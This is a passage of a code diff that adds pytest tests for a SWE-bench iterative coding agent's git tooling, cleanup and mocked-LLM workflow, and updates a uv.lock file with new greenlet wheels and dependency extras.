repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + MockRepo.clone_from.return_value = mock_repo + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = mock_repo + + result = await clone_repository(repo_url, target_path) + + assert result == mock_repo + + async def test_clone_repository_invalid_url(self, tmp_path): + """Test that invalid URLs raise ValueError.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + invalid_url = "not-a-valid-url" + + with pytest.raises(ValueError) as exc_info: + await clone_repository(invalid_url, target_path) + + assert "Invalid repository URL" in str(exc_info.value) + + async def test_checkout_commit_success(self): + """Test successful commit checkout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + commit_hash = "abc123" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = None + + await checkout_commit(mock_repo, commit_hash) + + # Verify checkout was called + mock_thread.assert_called_once() + + async def test_clone_timeout(self, tmp_path): + """Test that clone operation times out correctly.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await clone_repository(repo_url, target_path, timeout=1) + + +# 
=============================================================================
+# test_cleanup - Resource cleanup
+# =============================================================================
+
+class TestCleanup:
+    """Tests for resource cleanup operations."""
+
+    async def test_repo_manager_cleanup(self, tmp_path):
+        """Test that RepoManager cleans up all active repos."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager
+
+        manager = RepoManager(str(tmp_path))
+
+        # Create some fake repo directories
+        repo1 = tmp_path / "org1" / "repo1"
+        repo2 = tmp_path / "org2" / "repo2"
+        repo1.mkdir(parents=True)
+        repo2.mkdir(parents=True)
+
+        # Add to active repos
+        manager.active_repos[str(repo1)] = MagicMock(repo_path=repo1)
+        manager.active_repos[str(repo2)] = MagicMock(repo_path=repo2)
+
+        await manager.cleanup()
+
+        assert not repo1.exists()
+        assert not repo2.exists()
+        assert len(manager.active_repos) == 0
+
+    async def test_cleanup_handles_missing_directory(self, tmp_path):
+        """Test that cleanup handles already-deleted directories gracefully."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager
+
+        manager = RepoManager(str(tmp_path))
+
+        # Add a non-existent path to active repos
+        fake_path = tmp_path / "nonexistent"
+        manager.active_repos[str(fake_path)] = MagicMock(repo_path=fake_path)
+
+        # Should not raise
+        await manager.cleanup()
+
+        assert len(manager.active_repos) == 0
+
+    async def test_register_cleanup_error_handling(self, tmp_path):
+        """Test that a failing cleanup propagates its exception, i.e. the error
+        that the register.py cleanup path must handle gracefully."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager
+
+        # Create a manager whose cleanup raises an exception
+        manager = RepoManager(str(tmp_path))
+        manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed"))
+
+        # The simulated failure should propagate to the caller
+        with pytest.raises(Exception, match="Cleanup failed"):
+            await manager.cleanup()
+
+
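+# NOTE: The _build_task_description tests below construct SweBenchPredictor via
+# object.__new__(), which deliberately skips __init__ so the method can be
+# exercised without wiring up an LLM or workflow builder. This relies on the
+# assumption that _build_task_description reads no state set in __init__.
+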
+# =============================================================================
+# Additional coverage tests
+# =============================================================================
+
+class TestAdditionalCoverage:
+    """Additional tests to improve coverage."""
+
+    def test_build_task_description_with_hints(self):
+        """Test task description building with hints."""
+        from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor
+
+        # Create a mock SWEBenchInput
+        mock_input = MagicMock()
+        mock_input.problem_statement = "Fix the bug"
+        mock_input.hints_text = "Check the utils module"
+
+        # Create a minimal predictor to test the method
+        predictor = object.__new__(SweBenchPredictor)
+        result = predictor._build_task_description(mock_input)
+
+        assert "Fix the bug" in result
+        assert "Additional Context" in result
+        assert "Check the utils module" in result
+
+    def test_build_task_description_without_hints(self):
+        """Test task description building without hints."""
+        from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor
+
+        mock_input = MagicMock()
+        mock_input.problem_statement = "Fix the bug"
+        mock_input.hints_text = None
+
+        predictor = object.__new__(SweBenchPredictor)
+        result = predictor._build_task_description(mock_input)
+
+        assert "Fix the bug" in result
+        assert "Additional Context" not in result
+
+    async def test_repo_manager_setup_existing_repo(self, tmp_path):
+        """Test setup_repository when repo is already active."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoContext
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager
+
+        manager = RepoManager(str(tmp_path))
+
+        # Create a mock context already in active_repos
+        repo_path = tmp_path / "instance-1" / "org" / "repo"
+        repo_path.mkdir(parents=True)
+
+        mock_context = RepoContext(
+            repo_url="https://github.com/org/repo",
+            repo_path=repo_path,
+            repo=MagicMock()
+        )
+        manager.active_repos[str(repo_path)] = mock_context
+
+        with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.checkout_commit') as mock_checkout:
+            mock_checkout.return_value = None
+
+            result = await manager.setup_repository(
+                "https://github.com/org/repo",
+                "abc123",
+                "instance-1"
+            )
+
+            assert result == mock_context
+            mock_checkout.assert_called_once()
+
+    async def test_clone_cleans_existing_path(self, tmp_path):
+        """Test that clone removes an existing directory before cloning."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository
+
+        target_path = tmp_path / "repo"
+        target_path.mkdir()
+        (target_path / "existing_file.txt").write_text("old content")
+
+        with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo'):
+            mock_repo = MagicMock()
+
+            with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait:
+                mock_wait.return_value = mock_repo
+
+                result = await clone_repository("https://github.com/org/repo", target_path)
+
+                # The pre-existing directory should have been removed; in a real
+                # run the clone would then recreate it
+                assert result == mock_repo
+
+    async def test_checkout_timeout(self):
+        """Test checkout operation timeout."""
+        from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit
+
+        mock_repo = MagicMock()
+
+        with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait:
+            mock_wait.side_effect = TimeoutError()
+
+            with pytest.raises(asyncio.TimeoutError):
+                await checkout_commit(mock_repo, "abc123", timeout=1)
+
+    def test_output_truncation(self, agent):
+        """Test that long outputs are properly truncated."""
+        # Generate output longer than max_output_length (the test config uses 1000)
+        long_output = "x" * 2000
+
+        # Simulate the agent's head/tail truncation logic
+        max_length = agent.config.max_output_length
+        assert len(long_output) > max_length
+        elided_chars = len(long_output) - max_length
+        head_tail_length = max_length // 2
+        truncated = (
+            f"{long_output[:head_tail_length]}\n"
+            f"\n{elided_chars} characters elided\n\n"
+            f"{long_output[-head_tail_length:]}"
+        )
+
+        assert "1000 characters elided" in truncated
+        assert truncated.startswith("x" * head_tail_length)
+        assert truncated.endswith("x" * head_tail_length)
+
+    async def test_add_message_invalid_role(self, agent):
+        """Test that invalid role raises ValueError."""
+        with pytest.raises(ValueError) as exc_info:
+            agent.add_message("invalid_role", "content")
+
+        assert "Unknown role" in str(exc_info.value)
+
+
+class TestIntegrationMockedLLM:
+    """Integration tests with mocked LLM."""
+
+    async def test_full_workflow_simulation(self, tmp_path):
+        """Simulate a complete workflow with realistic LLM responses."""
+        # Create a mock LLM
+        mock_llm = AsyncMock()
+
+        # Simulate a realistic interaction: explore, edit, test, submit
+        
responses = [ + # Step 1: Explore + create_llm_response( + "THOUGHT: First, let me understand the project structure.\n\n```bash\nls -la\n```" + ), + # Step 2: Read file + create_llm_response( + "THOUGHT: Let me look at the main file.\n\n```bash\ncat main.py\n```" + ), + # Step 3: Make edit + create_llm_response( + "THOUGHT: I found the bug. Let me fix it.\n\n```bash\nsed -i 's/old/new/g' main.py\n```" + ), + # Step 4: Submit + create_llm_response( + "THOUGHT: The fix is complete. Submitting.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```" + ), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Create test files + repo_path = tmp_path / "repo" + repo_path.mkdir() + (repo_path / "main.py").write_text("old code here") + + config = IterativeAgentConfig(step_limit=10, timeout=5) + agent = IterativeAgent(mock_llm, repo_path, config) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # Return realistic outputs for each command + mock_thread.side_effect = [ + MagicMock(returncode=0, stdout="main.py\nREADME.md\n"), + MagicMock(returncode=0, stdout="old code here\n"), + MagicMock(returncode=0, stdout=""), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), + ] + + exit_status, _patch_result = await agent.run("Fix the bug in main.py") + + assert exit_status == "Submitted" + assert agent.n_steps == 4 + assert agent.total_input_tokens > 0 + assert agent.total_output_tokens > 0 diff --git a/examples/evaluation_and_profiling/swe_bench/uv.lock b/examples/evaluation_and_profiling/swe_bench/uv.lock index af3cf0b0ad..56ab2f0a51 100644 --- a/examples/evaluation_and_profiling/swe_bench/uv.lock +++ b/examples/evaluation_and_profiling/swe_bench/uv.lock @@ -932,6 +932,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/e8/2e1462c8fdbe0f210feb5ac7ad2d9029af8be3bf45bd9fa39765f821642f/greenlet-3.3.1-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:5fd23b9bc6d37b563211c6abbb1b3cab27db385a4449af5c32e932f93017080c", size = 274974, upload-time = "2026-01-23T15:31:02.891Z" }, { url = "https://files.pythonhosted.org/packages/7e/a8/530a401419a6b302af59f67aaf0b9ba1015855ea7e56c036b5928793c5bd/greenlet-3.3.1-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:09f51496a0bfbaa9d74d36a52d2580d1ef5ed4fdfcff0a73730abfbbbe1403dd", size = 577175, upload-time = "2026-01-23T16:00:56.213Z" }, { url = "https://files.pythonhosted.org/packages/8e/89/7e812bb9c05e1aaef9b597ac1d0962b9021d2c6269354966451e885c4e6b/greenlet-3.3.1-cp311-cp311-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:cb0feb07fe6e6a74615ee62a880007d976cf739b6669cce95daa7373d4fc69c5", size = 590401, upload-time = "2026-01-23T16:05:26.365Z" }, + { url = "https://files.pythonhosted.org/packages/70/ae/e2d5f0e59b94a2269b68a629173263fa40b63da32f5c231307c349315871/greenlet-3.3.1-cp311-cp311-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:67ea3fc73c8cd92f42467a72b75e8f05ed51a0e9b1d15398c913416f2dafd49f", size = 601161, upload-time = "2026-01-23T16:15:53.456Z" }, { url = "https://files.pythonhosted.org/packages/5c/ae/8d472e1f5ac5efe55c563f3eabb38c98a44b832602e12910750a7c025802/greenlet-3.3.1-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:39eda9ba259cc9801da05351eaa8576e9aa83eb9411e8f0c299e05d712a210f2", size = 590272, upload-time = "2026-01-23T15:32:49.411Z" }, { url = 
"https://files.pythonhosted.org/packages/a8/51/0fde34bebfcadc833550717eade64e35ec8738e6b097d5d248274a01258b/greenlet-3.3.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e2e7e882f83149f0a71ac822ebf156d902e7a5d22c9045e3e0d1daf59cee2cc9", size = 1550729, upload-time = "2026-01-23T16:04:20.867Z" }, { url = "https://files.pythonhosted.org/packages/16/c9/2fb47bee83b25b119d5a35d580807bb8b92480a54b68fef009a02945629f/greenlet-3.3.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:80aa4d79eb5564f2e0a6144fcc744b5a37c56c4a92d60920720e99210d88db0f", size = 1615552, upload-time = "2026-01-23T15:33:45.743Z" }, @@ -940,6 +941,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/f9/c8/9d76a66421d1ae24340dfae7e79c313957f6e3195c144d2c73333b5bfe34/greenlet-3.3.1-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:7e806ca53acf6d15a888405880766ec84721aa4181261cd11a457dfe9a7a4975", size = 276443, upload-time = "2026-01-23T15:30:10.066Z" }, { url = "https://files.pythonhosted.org/packages/81/99/401ff34bb3c032d1f10477d199724f5e5f6fbfb59816ad1455c79c1eb8e7/greenlet-3.3.1-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d842c94b9155f1c9b3058036c24ffb8ff78b428414a19792b2380be9cecf4f36", size = 597359, upload-time = "2026-01-23T16:00:57.394Z" }, { url = "https://files.pythonhosted.org/packages/2b/bc/4dcc0871ed557792d304f50be0f7487a14e017952ec689effe2180a6ff35/greenlet-3.3.1-cp312-cp312-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:20fedaadd422fa02695f82093f9a98bad3dab5fcda793c658b945fcde2ab27ba", size = 607805, upload-time = "2026-01-23T16:05:28.068Z" }, + { url = "https://files.pythonhosted.org/packages/3b/cd/7a7ca57588dac3389e97f7c9521cb6641fd8b6602faf1eaa4188384757df/greenlet-3.3.1-cp312-cp312-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:c620051669fd04ac6b60ebc70478210119c56e2d5d5df848baec4312e260e4ca", size = 622363, upload-time = "2026-01-23T16:15:54.754Z" }, { url = "https://files.pythonhosted.org/packages/cf/05/821587cf19e2ce1f2b24945d890b164401e5085f9d09cbd969b0c193cd20/greenlet-3.3.1-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:14194f5f4305800ff329cbf02c5fcc88f01886cadd29941b807668a45f0d2336", size = 609947, upload-time = "2026-01-23T15:32:51.004Z" }, { url = "https://files.pythonhosted.org/packages/a4/52/ee8c46ed9f8babaa93a19e577f26e3d28a519feac6350ed6f25f1afee7e9/greenlet-3.3.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:7b2fe4150a0cf59f847a67db8c155ac36aed89080a6a639e9f16df5d6c6096f1", size = 1567487, upload-time = "2026-01-23T16:04:22.125Z" }, { url = "https://files.pythonhosted.org/packages/8f/7c/456a74f07029597626f3a6db71b273a3632aecb9afafeeca452cfa633197/greenlet-3.3.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:49f4ad195d45f4a66a0eb9c1ba4832bb380570d361912fa3554746830d332149", size = 1636087, upload-time = "2026-01-23T15:33:47.486Z" }, @@ -948,6 +950,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/ab/d26750f2b7242c2b90ea2ad71de70cfcd73a948a49513188a0fc0d6fc15a/greenlet-3.3.1-cp313-cp313-macosx_11_0_universal2.whl", hash = "sha256:7ab327905cabb0622adca5971e488064e35115430cec2c35a50fd36e72a315b3", size = 275205, upload-time = "2026-01-23T15:30:24.556Z" }, { url = "https://files.pythonhosted.org/packages/10/d3/be7d19e8fad7c5a78eeefb2d896a08cd4643e1e90c605c4be3b46264998f/greenlet-3.3.1-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:65be2f026ca6a176f88fb935ee23c18333ccea97048076aef4db1ef5bc0713ac", size = 
599284, upload-time = "2026-01-23T16:00:58.584Z" }, { url = "https://files.pythonhosted.org/packages/ae/21/fe703aaa056fdb0f17e5afd4b5c80195bbdab701208918938bd15b00d39b/greenlet-3.3.1-cp313-cp313-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:7a3ae05b3d225b4155bda56b072ceb09d05e974bc74be6c3fc15463cf69f33fd", size = 610274, upload-time = "2026-01-23T16:05:29.312Z" }, + { url = "https://files.pythonhosted.org/packages/06/00/95df0b6a935103c0452dad2203f5be8377e551b8466a29650c4c5a5af6cc/greenlet-3.3.1-cp313-cp313-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:12184c61e5d64268a160226fb4818af4df02cfead8379d7f8b99a56c3a54ff3e", size = 624375, upload-time = "2026-01-23T16:15:55.915Z" }, { url = "https://files.pythonhosted.org/packages/cb/86/5c6ab23bb3c28c21ed6bebad006515cfe08b04613eb105ca0041fecca852/greenlet-3.3.1-cp313-cp313-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6423481193bbbe871313de5fd06a082f2649e7ce6e08015d2a76c1e9186ca5b3", size = 612904, upload-time = "2026-01-23T15:32:52.317Z" }, { url = "https://files.pythonhosted.org/packages/c2/f3/7949994264e22639e40718c2daf6f6df5169bf48fb038c008a489ec53a50/greenlet-3.3.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:33a956fe78bbbda82bfc95e128d61129b32d66bcf0a20a1f0c08aa4839ffa951", size = 1567316, upload-time = "2026-01-23T16:04:23.316Z" }, { url = "https://files.pythonhosted.org/packages/8d/6e/d73c94d13b6465e9f7cd6231c68abde838bb22408596c05d9059830b7872/greenlet-3.3.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b065d3284be43728dd280f6f9a13990b56470b81be20375a207cdc814a983f2", size = 1636549, upload-time = "2026-01-23T15:33:48.643Z" }, @@ -2003,8 +2006,8 @@ requires-dist = [ { name = "nvidia-nat-autogen", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_autogen" }, { name = "nvidia-nat-core", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", marker = "extra == 'core'", editable = "../../../packages/nvidia_nat_core" }, - { name = "nvidia-nat-core", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["async-endpoints"], marker = "extra == 'async-endpoints'", editable = "../../../packages/nvidia_nat_core" }, + { name = "nvidia-nat-core", extras = ["async-endpoints", "gunicorn", "pii-defense", "profiling"], marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["gunicorn"], marker = "extra == 'gunicorn'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["pii-defense"], marker = "extra == 'pii-defense'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["profiling"], marker = "extra == 'profiling'", editable = "../../../packages/nvidia_nat_core" },